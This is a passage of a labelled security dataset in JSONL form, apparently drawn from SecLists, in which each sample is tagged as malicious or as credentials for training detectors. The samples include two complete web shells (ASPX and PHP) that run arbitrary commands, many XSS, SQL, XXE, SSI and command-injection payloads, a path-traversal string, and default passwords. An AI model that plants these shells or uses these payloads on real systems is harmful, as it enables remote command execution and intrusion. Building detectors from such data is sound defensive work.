false;\n\t\t// Do not create the black window.\n\t\tprocStartInfo.CreateNoWindow = true;\n\t\t// Now we create a process, assign its ProcessStartInfo and start it\n\t\tSystem.Diagnostics.Process p = new System.Diagnostics.Process();\n\t\tp.StartInfo = procStartInfo;\n\t\tp.Start();\n\t\t// Get the output and error into a string\n\t\tstdout = p.StandardOutput.ReadToEnd();\n\t\tstderr = p.StandardError.ReadToEnd();\n\t//}\n\t//catch (Exception objException)\n\t//{\n\t}\n}\n</script>\n<html>\n<head><title>Laundanum ASPX Shell</title></head>\n<body onload=\"document.shell.c.focus()\">\n\n<form method=\"post\" name=\"shell\">\ncmd /c <input type=\"text\" name=\"c\"/>\n<input type=\"submit\"><br/>\nSTDOUT:<br/>\n<pre><% = stdout.Replace(\"<\", \"&lt;\") %></pre>\n<br/>\n<br/>\n<br/>\nSTDERR:<br/>\n<pre><% = stderr.Replace(\"<\", \"&lt;\") %></pre>\n\n\n</form>\n\n <hr/>\n <address>\n Copyright &", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "aspx", "filename": "shell.aspx"}}]} {"id": "seclists_02597", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"forwarded\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"forwarded\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02598", "source": "seclists", "source_license": "MIT", "text": "filename=&#x03C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x03C", "injection_type": "cmd"}}]} {"id": "seclists_02599", "source": "seclists", "source_license": "MIT", "text": "password: bird\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "bird"}}]} {"id": "seclists_02600", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<rtc onbeforecopy=\"alert(1)\" contenteditable>test</rtc>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rtc onbeforecopy=\"alert(1)\" contenteditable>test</rtc>", "injection_type": "XSS"}}]} {"id": "seclists_02601", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<multicol draggable=\"true\" ondragend=\"alert(1)\">test</multicol> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<multicol draggable=\"true\" ondragend=\"alert(1)\">test</multicol>", "injection_type": "XSS"}}]} {"id": "seclists_02602", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"_(1)\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "_(1)", "injection_type": "XSS"}}]} {"id": "seclists_02603", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or 1=1 or ''='';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 1=1 or ''='", "injection_type": "SQL"}}]} {"id": "seclists_02604", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=chinook\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "chinook"}}]} {"id": "seclists_02605", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'> \"> %int;", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'> \"> %int;", "injection_type": "XXE"}}]} {"id": "seclists_02606", "source": "seclists", "source_license": "MIT", "text": "filename=%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_02607", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Belkin,<BLANK>,MiniAP,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Belkin,<BLANK>,MiniAP,"}}]} {"id": "seclists_02608", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\\x23 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x23", "injection_type": "cmd"}}]} {"id": "seclists_02609", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: ];a=eval;b=alert;a(b(16));//</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: ];a=eval;b=alert;a(b(16));//", "injection_type": "XSS"}}]} {"id": "seclists_02610", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%203%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%203%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_02611", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"path_translated\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"path_translated\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02612", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, super short, self contained</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, super short, self contained", "injection_type": "XSS"}}]} {"id": "seclists_02613", "source": "seclists", "source_license": "MIT", "text": "password: xngwoj\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "xngwoj"}}]} {"id": "seclists_02614", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=1q2w3e\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "1q2w3e"}}]} {"id": "seclists_02615", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:sitara,root,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sitara,root,<BLANK>,"}}]} {"id": "seclists_02616", "source": "seclists", "source_license": "MIT", "text": "filename='%7Cecho%20DPUJIL$((23%2B45))$(echo%20DPUJIL)DPUJIL|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%7Cecho%20DPUJIL$((23%2B45))$(echo%20DPUJIL)DPUJIL|", "injection_type": "cmd"}}]} {"id": "seclists_02617", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector uses an urlencoded carriage return to break JS code and produce an alert afterwards.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector uses an urlencoded carriage return to break JS code and produce an alert afterwards.", "injection_type": "XSS"}}]} {"id": "seclists_02618", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_02619", "source": "seclists", "source_license": "MIT", "text": "username=' or 1=1&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 1=1", "injection_type": "SQL"}}]} {"id": "seclists_02620", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_02621", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &apos;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&apos;", "injection_type": "cmd"}}]} {"id": "seclists_02622", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:scooter@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "scooter"}}]} {"id": "seclists_02623", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:buzz@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "buzz"}}]} {"id": "seclists_02624", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=band\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "band"}}]} {"id": "seclists_02625", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\ndb.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1", "injection_type": "NoSQL"}}]} {"id": "seclists_02626", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=x' AND members.email IS NULL; -- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' AND members.email IS NULL; --", "injection_type": "SQL"}}]} {"id": "seclists_02627", "source": "seclists", "source_license": "MIT", "text": "password: 3COM,write,synnet,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "3COM,write,synnet,"}}]} {"id": "seclists_02628", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf (sqlattempt2)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(sqlattempt2)", "injection_type": "cmd"}}]} {"id": "seclists_02629", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><sub onkeypress=\"alert(1)\" contenteditable>test</sub></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<sub onkeypress=\"alert(1)\" contenteditable>test</sub>", "injection_type": "XSS"}}]} {"id": "seclists_02630", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAGBBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_02631", "source": "seclists", "source_license": "MIT", "text": "password: frisbee\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "frisbee"}}]} {"id": "seclists_02632", "source": "seclists", "source_license": "MIT", "text": "password: Hewlett-Packard,HELLO,OP.OPERATOR,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,HELLO,OP.OPERATOR,"}}]} {"id": "seclists_02633", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "injection_type": "cmd"}}]} {"id": "seclists_02634", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><details ontoggle=alert(1) open>test</details></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<details ontoggle=alert(1) open>test</details>", "injection_type": "XSS"}}]} {"id": "seclists_02635", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<noembed draggable=\"true\" ondragend=\"alert(1)\">test</noembed>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noembed draggable=\"true\" ondragend=\"alert(1)\">test</noembed>", "injection_type": "XSS"}}]} {"id": "seclists_02636", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_02637", "source": "seclists", "source_license": "MIT", "text": "filename=\\x27\\x4F\\x52 SELECT *", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x27\\x4F\\x52 SELECT *", "injection_type": "cmd"}}]} {"id": "seclists_02638", "source": "seclists", "source_license": "MIT", "text": "username=admin\") or (\"1\"=\"1&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or (\"1\"=\"1", "injection_type": "SQL"}}]} {"id": "seclists_02639", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x ondrag=alert(1)>drag this!</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x ondrag=alert(1)>drag this!", "injection_type": "XSS"}}]} {"id": "seclists_02640", "source": "seclists", "source_license": "MIT", "text": "filename=%20|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20|", "injection_type": "cmd"}}]} {"id": "seclists_02641", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Deerfield,MDaemon,MServer,web interface to manage MDaemon. fixed June 2002", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Deerfield,MDaemon,MServer,web interface to manage MDaemon. fixed June 2002"}}]} {"id": "seclists_02642", "source": "seclists", "source_license": "MIT", "text": "<?\n//\n// PHP_KIT\n//\n// cmd.php = Command Execution\n//\n// by: The Dark Raver\n// modified: 21/01/2004\n//\n?>\n<HTML><BODY>\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<?\nif($_GET['cmd']) {\n system($_GET['cmd']);\n }\n?>\n</pre>\n</BODY></HTML>\n\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "cmd.php"}}]} {"id": "seclists_02643", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\"a\"\" or 1=1--\" HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"a\"\" or 1=1--\"", "injection_type": "SQL"}}]} {"id": "seclists_02644", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Nortel,administrator,PlsChgMe!,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Nortel,administrator,PlsChgMe!,"}}]} {"id": "seclists_02645", "source": "seclists", "source_license": "MIT", "text": "username=||'6&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||'6", "injection_type": "SQL"}}]} {"id": "seclists_02646", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=IBM,TSAFVM,<BLANK>,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,TSAFVM,<BLANK>,"}}]} {"id": "seclists_02647", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <A HREF=\"http://google.com/\">XSS</A>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <A HREF=\"http://google.com/\">XSS</A>", "injection_type": "XSS"}}]} {"id": "seclists_02648", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><wbr draggable=\"true\" ondrag=\"alert(1)\">test</wbr></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<wbr draggable=\"true\" ondrag=\"alert(1)\">test</wbr>", "injection_type": "XSS"}}]} {"id": "seclists_02649", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: /'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/'", "injection_type": "cmd"}}]} {"id": "seclists_02650", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: DIV expression HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: DIV expression", "injection_type": "XSS"}}]} {"id": "seclists_02651", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02652", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=') or ('a'='a HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "') or ('a'='a", "injection_type": "SQL"}}]} {"id": "seclists_02653", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|echo%20WJNDLY$((76%2B22))$(echo%20WJNDLY)WJNDLY\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo%20WJNDLY$((76%2B22))$(echo%20WJNDLY)WJNDLY\"", "injection_type": "cmd"}}]} {"id": "seclists_02654", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02655", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_accept\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_accept\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02656", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<body onpageshow=alert(1)>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onpageshow=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_02657", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E", "injection_type": "cmd"}}]} {"id": "seclists_02658", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><div draggable=\"true\" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu>", "injection_type": "XSS"}}]} {"id": "seclists_02659", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<hgroup onmouseout=\"alert(1)\">test</hgroup>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<hgroup onmouseout=\"alert(1)\">test</hgroup>", "injection_type": "XSS"}}]} {"id": "seclists_02660", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ../../../../../../../../../../../../etc/hosts%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "../../../../../../../../../../../../etc/hosts%00", "injection_type": "cmd"}}]} {"id": "seclists_02661", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: */a=eval;b=alert;a(b(/e/.source));/* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: */a=eval;b=alert;a(b(/e/.source));/*", "injection_type": "XSS"}}]} {"id": "seclists_02662", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", "injection_type": "SQL"}}]} {"id": "seclists_02663", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><col id=x tabindex=1 onbeforeactivate=alert(1)></col></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<col id=x tabindex=1 onbeforeactivate=alert(1)></col>", "injection_type": "XSS"}}]} {"id": "seclists_02664", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: |echo$IFSJJVJHF$((77%2B32))$(echo$IFSJJVJHF)JJVJHF\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo$IFSJJVJHF$((77%2B32))$(echo$IFSJJVJHF)JJVJHF\\", "injection_type": "cmd"}}]} {"id": "seclists_02665", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<object oncut=\"alert(1)\" contenteditable>test</object> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<object oncut=\"alert(1)\" contenteditable>test</object>", "injection_type": "XSS"}}]} {"id": "seclists_02666", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"auth_type\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"auth_type\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02667", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=UNIX,sys,system,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,sys,system,"}}]} {"id": "seclists_02668", "source": "seclists", "source_license": "MIT", "text": "filename=&#X03C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X03C;", "injection_type": "cmd"}}]} {"id": "seclists_02669", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=mklencke,root,blablabla,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mklencke,root,blablabla,"}}]} {"id": "seclists_02670", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf :response.write 111111", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ":response.write 111111", "injection_type": "cmd"}}]} {"id": "seclists_02671", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, obfuscated, injection\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, injection", "injection_type": "XSS"}}]} {"id": "seclists_02672", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 2 between 1 and 3';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 2 between 1 and 3", "injection_type": "SQL"}}]} {"id": "seclists_02673", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=pg_sleep(__TIME__)-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_02674", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02675", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#X00003C", "findings": [{"category": "malicious", "subcategory": 